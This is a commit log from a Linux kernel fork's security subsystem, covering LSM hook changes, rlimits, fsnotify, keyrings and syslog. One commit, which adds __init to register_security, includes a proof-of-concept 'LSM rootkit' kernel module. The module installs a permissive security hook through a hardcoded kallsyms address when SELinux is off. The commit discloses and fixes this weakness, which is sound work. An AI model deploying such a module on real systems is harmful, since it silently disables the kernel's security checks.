Doug / smarc-fsl-linux-kernel

11 Aug, 2010

2 commits

  • b34d8915c   Merge branch 'writable_limits' of git://decibel.fi.muni.cz/~xslaby/linux ... Browse Code »

    * 'writable_limits' of git://decibel.fi.muni.cz/~xslaby/linux:
    unistd: add __NR_prlimit64 syscall numbers
    rlimits: implement prlimit64 syscall
    rlimits: switch more rlimit syscalls to do_prlimit
    rlimits: redo do_setrlimit to more generic do_prlimit
    rlimits: add rlimit64 structure
    rlimits: do security check under task_lock
    rlimits: allow setrlimit to non-current tasks
    rlimits: split sys_setrlimit
    rlimits: selinux, do rlimits changes under task_lock
    rlimits: make sure ->rlim_max never grows in sys_setrlimit
    rlimits: add task_struct to update_rlimit_cpu
    rlimits: security, add task_struct to setrlimit

    Fix up various system call number conflicts. We not only added fanotify
    system calls in the meantime, but asm-generic/unistd.h added a wait4
    along with a range of reserved per-architecture system calls.

    Linus Torvalds
     
  • 8c8946f50   Merge branch 'for-linus' of git://git.infradead.org/users/eparis/notify ... Browse Code »

    * 'for-linus' of git://git.infradead.org/users/eparis/notify: (132 commits)
    fanotify: use both marks when possible
    fsnotify: pass both the vfsmount mark and inode mark
    fsnotify: walk the inode and vfsmount lists simultaneously
    fsnotify: rework ignored mark flushing
    fsnotify: remove global fsnotify groups lists
    fsnotify: remove group->mask
    fsnotify: remove the global masks
    fsnotify: cleanup should_send_event
    fanotify: use the mark in handler functions
    audit: use the mark in handler functions
    dnotify: use the mark in handler functions
    inotify: use the mark in handler functions
    fsnotify: send fsnotify_mark to groups in event handling functions
    fsnotify: Exchange list heads instead of moving elements
    fsnotify: srcu to protect read side of inode and vfsmount locks
    fsnotify: use an explicit flag to indicate fsnotify_destroy_mark has been called
    fsnotify: use _rcu functions for mark list traversal
    fsnotify: place marks on object in order of group memory address
    vfs/fsnotify: fsnotify_close can delay the final work in fput
    fsnotify: store struct file not struct path
    ...

    Fix up trivial delete/modify conflict in fs/notify/inotify/inotify.c.

    Linus Torvalds
     

02 Aug, 2010

1 commit

  • ea0d3ab23   LSM: Remove unused arguments from security_path_truncate(). ... Browse Code »

    When commit be6d3e56a6b9b3a4ee44a0685e39e595073c6f0d "introduce new LSM hooks
    where vfsmount is available." was proposed, regarding security_path_truncate(),
    only "struct file *" argument (which AppArmor wanted to use) was removed.
    But length and time_attrs arguments are not used by TOMOYO nor AppArmor.
    Thus, let's remove these arguments.

    Signed-off-by: Tetsuo Handa
    Acked-by: Nick Piggin
    Signed-off-by: James Morris

    Tetsuo Handa
     

28 Jul, 2010

1 commit

  • c4ec54b40   fsnotify: new fsnotify hooks and events types for access decisions ... Browse Code »

    introduce a new fsnotify hook, fsnotify_perm(), which is called from the
    security code. This hook is used to allow fsnotify groups to make access
    control decisions about events on the system. We also must change the
    generic fsnotify function to return an error code if we intend these hooks
    to be in any way useful.

    Signed-off-by: Eric Paris

    Eric Paris
     

16 Jul, 2010

1 commit

17 May, 2010

1 commit

12 Apr, 2010

13 commits

09 Mar, 2010

1 commit

03 Mar, 2010

1 commit

  • c1e992b99   Security: Add __init to register_security to disable load a security module on runtime ... Browse Code »

    LSM framework doesn't allow to load a security module on runtime, it must be loaded on boot time.
    but in security/security.c:
    int register_security(struct security_operations *ops)
    {
    ...
    if (security_ops != &default_security_ops)
    return -EAGAIN;
    ...
    }
    if security_ops == &default_security_ops, it can access to register a security module. If selinux is enabled,
    other security modules can't register, but if selinux is disabled on boot time, the security_ops was set to
    default_security_ops, LSM allows other kernel modules to use register_security() to register a not trust
    security module. For example:

    disable selinux on boot time(selinux=0).

    #include
    #include
    #include
    #include
    #include
    #include
    #include

    MODULE_LICENSE("GPL");
    MODULE_AUTHOR("wzt");

    extern int register_security(struct security_operations *ops);
    int (*new_register_security)(struct security_operations *ops);

    int rootkit_bprm_check_security(struct linux_binprm *bprm)
    {
    return 0;
    }

    struct security_operations rootkit_ops = {
    .bprm_check_security = rootkit_bprm_check_security,
    };

    static int rootkit_init(void)
    {
    printk("Load LSM rootkit module.\n");

    /* cat /proc/kallsyms | grep register_security */
    new_register_security = 0xc0756689;
    if (new_register_security(&rootkit_ops)) {
    printk("Can't register rootkit module.\n");
    return 0;
    }
    printk("Register rootkit module ok.\n");

    return 0;
    }

    static void rootkit_exit(void)
    {
    printk("Unload LSM rootkit module.\n");
    }

    module_init(rootkit_init);
    module_exit(rootkit_exit);

    Signed-off-by: Zhitong Wang
    Signed-off-by: James Morris

    wzt.wzt@gmail.com
     

01 Mar, 2010

1 commit

24 Feb, 2010

1 commit

  • 189b3b1c8   Security: add static to security_ops and default_security_ops variable ... Browse Code »

    Enhance the security framework to support resetting the active security
    module. This eliminates the need for direct use of the security_ops and
    default_security_ops variables outside of security.c, so make security_ops
    and default_security_ops static. Also remove the secondary_ops variable as
    a cleanup since there is no use for that. secondary_ops was originally used by
    SELinux to call the "secondary" security module (capability or dummy),
    but that was replaced by direct calls to capability and the only
    remaining use is to save and restore the original security ops pointer
    value if SELinux is disabled by early userspace based on /etc/selinux/config.
    Further, if we support this directly in the security framework, then we can
    just use &default_security_ops for this purpose since that is now available.

    Signed-off-by: Zhitong Wang
    Acked-by: Stephen Smalley
    Signed-off-by: James Morris

    wzt.wzt@gmail.com
     

07 Feb, 2010

1 commit

04 Feb, 2010

1 commit

  • 002345925   syslog: distinguish between /proc/kmsg and syscalls ... Browse Code »

    This allows the LSM to distinguish between syslog functions originating
    from /proc/kmsg access and direct syscalls. By default, the commoncaps
    will now no longer require CAP_SYS_ADMIN to read an opened /proc/kmsg
    file descriptor. For example the kernel syslog reader can now drop
    privileges after opening /proc/kmsg, instead of staying privileged with
    CAP_SYS_ADMIN. MAC systems that implement security_syslog have unchanged
    behavior.

    Signed-off-by: Kees Cook
    Acked-by: Serge Hallyn
    Acked-by: John Johansen
    Signed-off-by: James Morris

    Kees Cook
     

15 Jan, 2010

1 commit

  • 8d9525048   security: correct error returns for get/set security with private inodes ... Browse Code »

    Currently, the getsecurity and setsecurity operations return zero for
    kernel private inodes, where xattrs are not available directly to
    userspace.

    This confuses some applications, and does not conform to the
    man page for getxattr(2) etc., which state that these syscalls
    should return ENOTSUP if xattrs are not supported or disabled.

    Note that in the listsecurity case, we still need to return zero
    as we don't know which other xattr handlers may be active.

    For discussion of userland confusion, see:
    http://www.mail-archive.com/bug-coreutils@gnu.org/msg17988.html

    This patch corrects the error returns so that ENOTSUP is reported
    to userspace as required.

    Signed-off-by: James Morris
    Acked-by: Stephen Smalley
    Acked-by: Serge Hallyn

    James Morris
     

08 Dec, 2009

1 commit

10 Nov, 2009

1 commit

  • dd8dbf2e6   security: report the module name to security_module_request ... Browse Code »

    For SELinux to do better filtering in userspace we send the name of the
    module along with the AVC denial when a program is denied module_request.

    Example output:

    type=SYSCALL msg=audit(11/03/2009 10:59:43.510:9) : arch=x86_64 syscall=write success=yes exit=2 a0=3 a1=7fc28c0d56c0 a2=2 a3=7fffca0d7440 items=0 ppid=1727 pid=1729 auid=unset uid=root gid=root euid=root suid=root fsuid=root egid=root sgid=root fsgid=root tty=(none) ses=unset comm=rpc.nfsd exe=/usr/sbin/rpc.nfsd subj=system_u:system_r:nfsd_t:s0 key=(null)
    type=AVC msg=audit(11/03/2009 10:59:43.510:9) : avc: denied { module_request } for pid=1729 comm=rpc.nfsd kmod="net-pf-10" scontext=system_u:system_r:nfsd_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=system

    Signed-off-by: Eric Paris
    Signed-off-by: James Morris

    Eric Paris
     

09 Nov, 2009

1 commit

  • 6e65f92ff   Config option to set a default LSM ... Browse Code »

    The LSM currently requires setting a kernel parameter at boot to select
    a specific LSM. This adds a config option that allows specifying a default
    LSM that is used unless overridden with the security= kernel parameter.
    If the the config option is not set the current behavior of first LSM
    to register is used.

    Signed-off-by: John Johansen
    Acked-by: Serge Hallyn
    Signed-off-by: James Morris

    John Johansen
     

25 Oct, 2009

1 commit

12 Oct, 2009

2 commits

10 Sep, 2009

1 commit

  • 1ee65e37e   LSM/SELinux: inode_{get,set,notify}secctx hooks to access LSM security context information. ... Browse Code »

    This patch introduces three new hooks. The inode_getsecctx hook is used to get
    all relevant information from an LSM about an inode. The inode_setsecctx is
    used to set both the in-core and on-disk state for the inode based on a context
    derived from inode_getsecctx.The final hook inode_notifysecctx will notify the
    LSM of a change for the in-core state of the inode in question. These hooks are
    for use in the labeled NFS code and addresses concerns of how to set security
    on an inode in a multi-xattr LSM. For historical reasons Stephen Smalley's
    explanation of the reason for these hooks is pasted below.

    Quote Stephen Smalley

    inode_setsecctx: Change the security context of an inode. Updates the
    in core security context managed by the security module and invokes the
    fs code as needed (via __vfs_setxattr_noperm) to update any backing
    xattrs that represent the context. Example usage: NFS server invokes
    this hook to change the security context in its incore inode and on the
    backing file system to a value provided by the client on a SETATTR
    operation.

    inode_notifysecctx: Notify the security module of what the security
    context of an inode should be. Initializes the incore security context
    managed by the security module for this inode. Example usage: NFS
    client invokes this hook to initialize the security context in its
    incore inode to the value provided by the server for the file when the
    server returned the file's attributes to the client.

    Signed-off-by: David P. Quigley
    Acked-by: Serge Hallyn
    Signed-off-by: James Morris

    David P. Quigley
     

02 Sep, 2009

1 commit

  • ee18d64c1   KEYS: Add a keyctl to install a process's session keyring on its parent [try #6] ... Browse Code »

    Add a keyctl to install a process's session keyring onto its parent. This
    replaces the parent's session keyring. Because the COW credential code does
    not permit one process to change another process's credentials directly, the
    change is deferred until userspace next starts executing again. Normally this
    will be after a wait*() syscall.

    To support this, three new security hooks have been provided:
    cred_alloc_blank() to allocate unset security creds, cred_transfer() to fill in
    the blank security creds and key_session_to_parent() - which asks the LSM if
    the process may replace its parent's session keyring.

    The replacement may only happen if the process has the same ownership details
    as its parent, and the process has LINK permission on the session keyring, and
    the session keyring is owned by the process, and the LSM permits it.

    Note that this requires alteration to each architecture's notify_resume path.
    This has been done for all arches barring blackfin, m68k* and xtensa, all of
    which need assembly alteration to support TIF_NOTIFY_RESUME. This allows the
    replacement to be performed at the point the parent process resumes userspace
    execution.

    This allows the userspace AFS pioctl emulation to fully emulate newpag() and
    the VIOCSETTOK and VIOCSETTOK2 pioctls, all of which require the ability to
    alter the parent process's PAG membership. However, since kAFS doesn't use
    PAGs per se, but rather dumps the keys into the session keyring, the session
    keyring of the parent must be replaced if, for example, VIOCSETTOK is passed
    the newpag flag.

    This can be tested with the following program:

    #include
    #include
    #include

    #define KEYCTL_SESSION_TO_PARENT 18

    #define OSERROR(X, S) do { if ((long)(X) == -1) { perror(S); exit(1); } } while(0)

    int main(int argc, char **argv)
    {
    key_serial_t keyring, key;
    long ret;

    keyring = keyctl_join_session_keyring(argv[1]);
    OSERROR(keyring, "keyctl_join_session_keyring");

    key = add_key("user", "a", "b", 1, keyring);
    OSERROR(key, "add_key");

    ret = keyctl(KEYCTL_SESSION_TO_PARENT);
    OSERROR(ret, "KEYCTL_SESSION_TO_PARENT");

    return 0;
    }

    Compiled and linked with -lkeyutils, you should see something like:

    [dhowells@andromeda ~]$ keyctl show
    Session Keyring
    -3 --alswrv 4043 4043 keyring: _ses
    355907932 --alswrv 4043 -1 \_ keyring: _uid.4043
    [dhowells@andromeda ~]$ /tmp/newpag
    [dhowells@andromeda ~]$ keyctl show
    Session Keyring
    -3 --alswrv 4043 4043 keyring: _ses
    1055658746 --alswrv 4043 4043 \_ user: a
    [dhowells@andromeda ~]$ /tmp/newpag hello
    [dhowells@andromeda ~]$ keyctl show
    Session Keyring
    -3 --alswrv 4043 4043 keyring: hello
    340417692 --alswrv 4043 4043 \_ user: a

    Where the test program creates a new session keyring, sticks a user key named
    'a' into it and then installs it on its parent.

    Signed-off-by: David Howells
    Signed-off-by: James Morris

    David Howells
     

01 Sep, 2009

1 commit

  • 2b980dbd7   lsm: Add hooks to the TUN driver ... Browse Code »

    The TUN driver lacks any LSM hooks which makes it difficult for LSM modules,
    such as SELinux, to enforce access controls on network traffic generated by
    TUN users; this is particularly problematic for virtualization apps such as
    QEMU and KVM. This patch adds three new LSM hooks designed to control the
    creation and attachment of TUN devices, the hooks are:

    * security_tun_dev_create()
    Provides access control for the creation of new TUN devices

    * security_tun_dev_post_create()
    Provides the ability to create the necessary socket LSM state for newly
    created TUN devices

    * security_tun_dev_attach()
    Provides access control for attaching to existing, persistent TUN devices
    and the ability to update the TUN device's socket LSM state as necessary

    Signed-off-by: Paul Moore
    Acked-by: Eric Paris
    Acked-by: Serge Hallyn
    Acked-by: David S. Miller
    Signed-off-by: James Morris

    Paul Moore
     

14 Aug, 2009

1 commit

  • 9188499cd   security: introducing security_request_module ... Browse Code »

    Calling request_module() will trigger a userspace upcall which will load a
    new module into the kernel. This can be a dangerous event if the process
    able to trigger request_module() is able to control either the modprobe
    binary or the module binary. This patch adds a new security hook to
    request_module() which can be used by an LSM to control a processes ability
    to call request_module().

    Signed-off-by: Eric Paris
    Acked-by: Serge Hallyn
    Signed-off-by: James Morris

    Eric Paris
     

24 Jun, 2009

1 commit

  • 9e48858f7   security: rename ptrace_may_access => ptrace_access_check ... Browse Code »

    The ->ptrace_may_access() methods are named confusingly - the real
    ptrace_may_access() returns a bool, while these security checks have
    a retval convention.

    Rename it to ptrace_access_check, to reduce the confusion factor.

    [ Impact: cleanup, no code changed ]

    Signed-off-by: Ingo Molnar
    Signed-off-by: James Morris

    Ingo Molnar
     

04 Jun, 2009

1 commit

03 Apr, 2009

1 commit

28 Mar, 2009

1 commit

  • 8651d5c0b   lsm: Remove the socket_post_accept() hook ... Browse Code »

    The socket_post_accept() hook is not currently used by any in-tree modules
    and its existence continues to cause problems by confusing people about
    what can be safely accomplished using this hook. If a legitimate need for
    this hook arises in the future it can always be reintroduced.

    Signed-off-by: Paul Moore
    Signed-off-by: James Morris

    Paul Moore